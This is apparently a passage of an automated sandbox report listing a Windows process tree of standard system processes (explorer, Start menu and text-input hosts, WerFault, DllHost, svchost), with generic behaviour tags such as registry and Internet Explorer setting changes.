C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5004 -s 21283⤵
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2152 -s 14883⤵
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5960 -s 14603⤵
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca2⤵
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding2⤵
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Drops desktop.ini file(s)
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3244 -s 21203⤵
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding2⤵
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding2⤵
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca2⤵
- Modifies Internet Explorer settings
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3700 -s 15203⤵
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca2⤵
- Modifies registry class
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5488 -s 22323⤵
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5608 -s 21363⤵
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4084 -s 9603⤵
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2996 -s 15083⤵
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5768 -s 22003⤵
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca2⤵
- Modifies Internet Explorer settings
- Modifies registry class
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca2⤵
- Modifies registry class
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding2⤵
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5376 -s 10083⤵
-
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2600 -s 14643⤵
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXxw3e32mpkfkfbh0tznpwwqfw96t0tfx6.mca2⤵
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.IrisService.AppXwt29n3t7x7q6fgyrrbbqxwzkqjfjaw4y.mca2⤵
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.Accounts.AppXqe94epy97qwa6w3j6w132e8zvcs117nd.mca2⤵
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
